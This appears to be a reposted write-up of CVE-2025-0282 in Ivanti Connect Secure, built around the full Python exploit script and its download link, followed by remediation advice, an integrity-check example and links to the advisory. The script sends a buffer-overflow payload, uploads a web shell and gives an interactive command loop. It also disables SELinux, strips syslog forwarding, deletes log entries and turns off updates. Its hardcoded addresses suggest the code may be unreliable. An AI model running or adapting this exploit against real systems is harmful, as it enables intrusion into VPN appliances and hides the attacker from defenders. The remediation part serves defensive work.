CVE-2025-0282  Ivanti Connect Secure RCE exp

CVE-2025-0282 overview

CVE-2025-0282 is a critical vulnerability in Ivanti Connect Secure that allows remote code execution (RCE) through a buffer overflow. It lets an attacker upload malicious files (for example, a web shell) and run commands on the target system with elevated privileges.

Affected versions

CVE | Product | Affected versions | Affected CPE | Resolved version | Patch download
CVE-2025-0282 | Ivanti Connect Secure | 22.7R2 through 22.7R2.4 | cpe:2.3:a:ivanti:connect_secure:22.7:R2.4:*:*:*:*.*.* | 22.7R2.5 | Download Portal https://portal.ivanti.com/
CVE-2025-0283 | Ivanti Connect Secure | 22.7R2.4 and earlier; 9.1R18.9 and earlier | cpe:2.3:a:ivanti:connect_secure:22.7:R2.4:*:*:*:*.*.* | 22.7R2.5 | Download Portal https://portal.ivanti.com/
CVE-2025-0282 | Ivanti Policy Secure | 22.7R1 through 22.7R1.2 | cpe:2.3:a:ivanti:policy_secure:22.7:r1.2:*:*:*:*.*. | | Patch planned availability Jan. 21
CVE-2025-0283 | Ivanti Policy Secure | 22.7R1.2 and earlier | cpe:2.3:a:ivanti:policy_secure:22.7:r1.2:*:*:*:*.*. | | Patch planned availability Jan. 21
CVE-2025-0282 | Ivanti Neurons for ZTA gateways | 22.7R2 through 22.7R2.3 | N/A | 22.7R2.5 | Patch planned availability Jan. 21
CVE-2025-0283 | Ivanti Neurons for ZTA gateways | 22.7R2.3 and earlier | N/A | 22.7R2.5 | Patch planned availability Jan. 21

CVE-2025-0282 exploit download

https://github.com/absholi7ly/CVE-2025-0282-Ivanti-exploit/archive/refs/heads/main.zip

CVE_2025_0282_Ivanti.py

import requests
import sys
import struct
import socket
import ssl
import urllib3
import time

# Disable SSL warnings
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def create_exploit_payload(command, offset=500, system_address=0x0804a360, command_address=0x0804b008):

    payload = b"A" * offset  # Fill the buffer
    payload += struct.pack("<I", system_address)  # Overwrite return address with system()
    payload += b"BBBB"  # Fake return address
    payload += struct.pack("<I", command_address)  # Address of the command
    payload += command.encode()  # Command to execute
    return payload

def send_payload(target_ip, payload):

    try:
        context = ssl.create_default_context()
        context.check_hostname = False
        context.verify_mode = ssl.CERT_NONE

        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(5)
        ssl_sock = context.wrap_socket(sock, server_hostname=target_ip)

        ssl_sock.connect((target_ip, 443))
        print(f"[+] Connected to {target_ip} on port 443 (HTTPS).")

        exploit_endpoint = "/dana-na/auth/url_default/welcome.cgi"
        http_request = (
            f"POST {exploit_endpoint} HTTP/1.1\r\n"
            f"Host: {target_ip}\r\n"
            f"Content-Length: {len(payload)}\r\n"
            f"Content-Type: application/x-www-form-urlencoded\r\n"
            f"\r\n"
        ).encode() + payload

        ssl_sock.send(http_request)
        response = ssl_sock.recv(4096)
        ssl_sock.close()
        return response.decode(errors="replace")

    except Exception as e:
        print(f"[-] Error sending payload: {e}")
        return None

def exploit_vulnerability(target_ip, command):

    payload = create_exploit_payload(command)
    response = send_payload(target_ip, payload)
    if response:
        print("[+] Payload sent successfully.")
    else:
        print("[-] No response received.")

def upload_web_shell(target_ip, local_shell_path):

    try:
        with open(local_shell_path, "r") as f:
            web_shell_content = f.read()

        command = f"echo '{web_shell_content}' > /shell.php"
        exploit_vulnerability(target_ip, command)
        print("[+] Web shell uploaded successfully at /shell.php.")
        verify_shell(target_ip)

    except Exception as e:
        print(f"[-] Error uploading web shell: {e}")

def verify_shell(target_ip):

    shell_url = f"http://{target_ip}/shell.php"
    try:
        response = requests.get(shell_url, verify=False, timeout=10)
        if response.status_code == 200:
            print("[+] Web shell is accessible.")
        else:
            print(f"[-] Web shell is not accessible. HTTP status: {response.status_code}")
    except Exception as e:
        print(f"[-] Error verifying web shell: {e}")

def execute_shell_command(target_ip, command):

    shell_url = f"http://{target_ip}/shell.php"
    try:
        response = requests.post(shell_url, data={"cmd": command}, verify=False, timeout=10)
        if response.status_code == 200:
            print(f"[+] Command output:\n{response.text.strip()}")
        else:
            print(f"[-] Failed to execute command via shell. HTTP status: {response.status_code}")
    except Exception as e:
        print(f"[-] Error executing command via web shell: {e}")

def disable_selinux(target_ip):
    command = "setenforce 0"
    execute_shell_command(target_ip, command)
    print("[+] SELinux disabled.")

def prevent_syslog_forwarding(target_ip):
    command = "sed -i '/^*.* @/d' /etc/rsyslog.conf"
    execute_shell_command(target_ip, command)
    command = "systemctl restart rsyslog"
    execute_shell_command(target_ip, command)
    print("[+] Syslog forwarding disabled.")

def remount_drive_rw(target_ip):
    command = "mount -o remount,rw /"
    execute_shell_command(target_ip, command)
    print("[+] Drive remounted as read-write.")

def remove_log_entries(target_ip):
    command = "sed -i '/CVE-2025-0282/d' /var/log/*"
    execute_shell_command(target_ip, command)
    print("[+] Log entries related to the exploit removed.")

def enable_selinux(target_ip):
    command = "setenforce 1"
    execute_shell_command(target_ip, command)
    print("[+] SELinux re-enabled.")

def remount_drive_ro(target_ip):
    command = "mount -o remount,ro /"
    execute_shell_command(target_ip, command)
    print("[+] Drive remounted as read-only.")

def disable_updates(target_ip):

    commands = [
        "systemctl stop apt-daily.service",
        "systemctl disable apt-daily.service"
    ]
    for command in commands:
        execute_shell_command(target_ip, command)
    print("[+] System updates disabled successfully.")

def main():

    if len(sys.argv) != 3:
        print("Usage: python3 cve_2025_0282.py <target IP> <local_shell_path>")
        sys.exit(1)

    target_ip = sys.argv[1]
    local_shell_path = sys.argv[2]

    upload_web_shell(target_ip, local_shell_path)

    disable_selinux(target_ip)
    prevent_syslog_forwarding(target_ip)
    remount_drive_rw(target_ip)
    remove_log_entries(target_ip)
    enable_selinux(target_ip)
    remount_drive_ro(target_ip)

    while True:
        command = input("Enter command to execute on the target (or 'exit' to quit): ")
        if command.lower() == "exit":
            print("Exiting...")
            break

        execute_shell_command(target_ip, command)

if __name__ == "__main__":
    main()

Uploading a web shell

To upload a web shell to the target system with this tool:

python3 CVE_2025_0282_Ivanti.py <target_ip> <local_shell_path>
  • <target_ip>: IP address of the target server.
  • <local_shell_path>: path to the web shell file on the local machine.

Executing remote commands

Once the web shell has been uploaded, the tool lets you run commands on the target system interactively.

Remediation

Ivanti customers can use the Integrity Checker Tool (ICT) to identify exploitation of CVE-2025-0282.

For Connect Secure customers, Ivanti recommends, "out of an abundance of caution", performing a factory reset on appliances whose ICT scan results are clean before upgrading to version 22.7R2.5, and "ensuring all malware is removed" where the ICT results "show signs of compromise".

The Ivanti Product Security Incident Response Team (PSIRT) has released a new tool to strengthen your ability to verify the full integrity of Ivanti Connect Secure and Ivanti Policy Secure software.
This article introduces the newly developed Ivanti Connect Secure/Ivanti Policy Secure Integrity Tool and provides a quick-start guide.

The Integrity Tool lets administrators verify the ICS/IPS image installed on a virtual or hardware appliance. It checks the integrity of the entire file system and looks for any added or modified files.
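To illustrate what such a file-system integrity check does, here is an added example written for this page (it is not Ivanti's ICT and not code from the GitHub project): it builds a SHA-256 manifest of a file tree, then compares a later manifest against that baseline to list added, removed and modified files. The directory layout, file names and contents in demo() are constructed for the demonstration, and the tampering it simulates is the kind the exploit above performs (a dropped shell.php, a rewritten rsyslog.conf).

```python
import hashlib
import tempfile
from pathlib import Path


def build_manifest(root):
    """Map every regular file under root (path relative to root) to its SHA-256."""
    root = Path(root)
    manifest = {}
    for path in sorted(root.rglob("*")):
        if path.is_file() and not path.is_symlink():
            digest = hashlib.sha256(path.read_bytes()).hexdigest()
            manifest[path.relative_to(root).as_posix()] = digest
    return manifest


def diff_manifest(baseline, current):
    """Report files added, removed or modified relative to the baseline manifest."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    modified = sorted(p for p in baseline if p in current and baseline[p] != current[p])
    return {"added": added, "removed": removed, "modified": modified}


def demo():
    """Constructed scenario: baseline a tiny appliance-like tree, simulate
    post-exploitation changes, and return what the integrity diff reports."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "etc").mkdir()
        # Constructed forwarding rule, the kind the exploit's sed command deletes.
        (root / "etc" / "rsyslog.conf").write_text("*.* @192.0.2.10:514\n")
        (root / "home" / "webserver").mkdir(parents=True)
        (root / "home" / "webserver" / "index.html").write_text("<html></html>\n")
        baseline = build_manifest(root)  # taken from a known-good image

        # Simulated tampering: a new file dropped at the web root and the
        # syslog forwarding rule stripped from rsyslog.conf.
        (root / "shell.php").write_text("placeholder content, not a real shell\n")
        (root / "etc" / "rsyslog.conf").write_text("")

        return diff_manifest(baseline, build_manifest(root))


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(f"{kind}: {paths}")
```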

Intruders have historically targeted infrastructure devices. While an intruder can carry out many kinds of attacks against a network device, malicious actors are now looking for ways to subvert the normal behaviour of infrastructure devices.
In general, these intruders gain access by exploiting a vulnerability on the system or by manipulating authorized users through various social-engineering attacks.
See the Security Advisory section for all vulnerabilities and disclosures.

Integrity Checker Tool (ICT) download

Note: the Integrity Tool can only be used to check the integrity of the code version that is currently running.

Integrity Tool download
Integrity Checker Tool download


Integrity Checker Tool packages for specific server types and versions

Server type and version | Integrity Tool package
Ivanti Connect Secure 22.X_R1 | ICS_22.xR1_ICT_package-2511.1.pkg
Ivanti Connect Secure 22.X_R2 | ICS_22.xR2 ICT_package-2515.1.pkg
Ivanti Connect Secure 9.X | ICS_9.x ICT_package-24793.1.pkg
Ivanti Policy Secure 22.XR1 | IPS_22.xR1 ICT_package-605.1.pkg
Ivanti Policy Secure 9.X | IPS_9.x ICT_package-9953.1.pkg

Official advisory

https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Connect-Secure-Policy-Secure-ZTA-Gateways-CVE-2025-0282-CVE-2025-0283?language=en_US

Vulnerability details

https://cloud.google.com/blog/topics/threat-intelligence/ivanti-connect-secure-vpn-zero-day

Project

GitHub:
https://github.com/absholi7ly/CVE-2025-0282-Ivanti-exploit

Please credit the source and include a link when reposting.
